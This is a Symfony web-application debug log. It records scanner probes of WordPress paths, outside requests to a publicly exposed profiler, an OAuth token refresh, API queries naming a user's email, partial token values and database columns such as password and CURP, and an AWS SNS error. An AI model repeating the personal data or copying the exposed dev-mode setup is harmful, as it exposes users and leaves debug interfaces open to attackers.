[2025-12-20 18:44:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:52:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=time","method":"GET"} []
[2025-12-20 18:52:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 19:00:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=twig","method":"GET"} []
[2025-12-20 19:00:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 19:01:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8098e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8098e0?panel=db","method":"GET"} []
[2025-12-20 19:01:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 19:02:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=config","method":"GET"} []
[2025-12-20 19:02:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 19:05:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"30da96","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/30da96","method":"GET"} []
[2025-12-20 19:05:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 19:12:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=db","method":"GET"} []
[2025-12-20 19:12:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 19:12:58] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3f708d","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/3f708d/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-20 19:12:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-20 19:13:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f7acf9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f7acf9?panel=config","method":"GET"} []
[2025-12-20 19:13:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 19:13:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 19:13:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 19:13:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:13:55] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:13:55] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 19:13:55] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 19:13:55] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 19:17:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"711f96","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/711f96/search/results?limit=10&method=POST","method":"GET"} []
[2025-12-20 19:17:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=POST","method":"GET"} []
[2025-12-20 19:18:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=52.167.144.161&limit=10","method":"GET"} []
[2025-12-20 19:18:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=52.167.144.161&limit=10","method":"GET"} []
[2025-12-20 19:22:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=time","method":"GET"} []
[2025-12-20 19:22:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 19:29:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
[2025-12-20 19:29:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
[2025-12-20 19:30:07] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-20 19:30:07] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["3d8ae38adb2908af83e0a5c5e4 [...]"] []
[2025-12-20 19:30:07] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 19:30:07] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"44b5b9e6a8d88fdffe816d2232 [...]","3":"2025-12-20 20:00:07","4":"","5":398,"6":"[]"} []
[2025-12-20 19:30:07] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 19:30:07] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 19:30:07] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"ac37f938310f627b158741a7fa [...]","3":"2026-02-18 19:30:07","4":"","5":398,"6":"[]"} []
[2025-12-20 19:30:07] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 19:30:07] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 19:30:07] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"3d8ae38adb2908af83e0a5c5e4 [...]"] []
[2025-12-20 19:30:07] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 19:30:07] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-20 19:30:07] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 19:30:07] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:07] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:07] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
[2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:07] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:07] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:07] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-20 19:30:07] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-20 19:30:07] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 19:30:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-20 19:30:08] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 19:30:08] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
[2025-12-20 19:30:08] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 19:30:08] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:08] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["450EEF16-4822-4D9B-B6A0-EF [...]",1,398] []
[2025-12-20 19:30:08] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/10/0?order=desc","method":"GET"} []
[2025-12-20 19:30:08] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 19:30:08] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
[2025-12-20 19:30:08] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClie (truncated...) InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClientTokenId</Code> <Message>The security token included in the request is invalid.</Message> </Error> <RequestId>f35134db-1a31-572c-8958-551be1b12f61</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClientTokenId</Code>\n <Message>The security token included in the request is invalid.</Message>\n </Error>\n <RequestId>f35134db-1a31-572c-8958-551be1b12f61</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
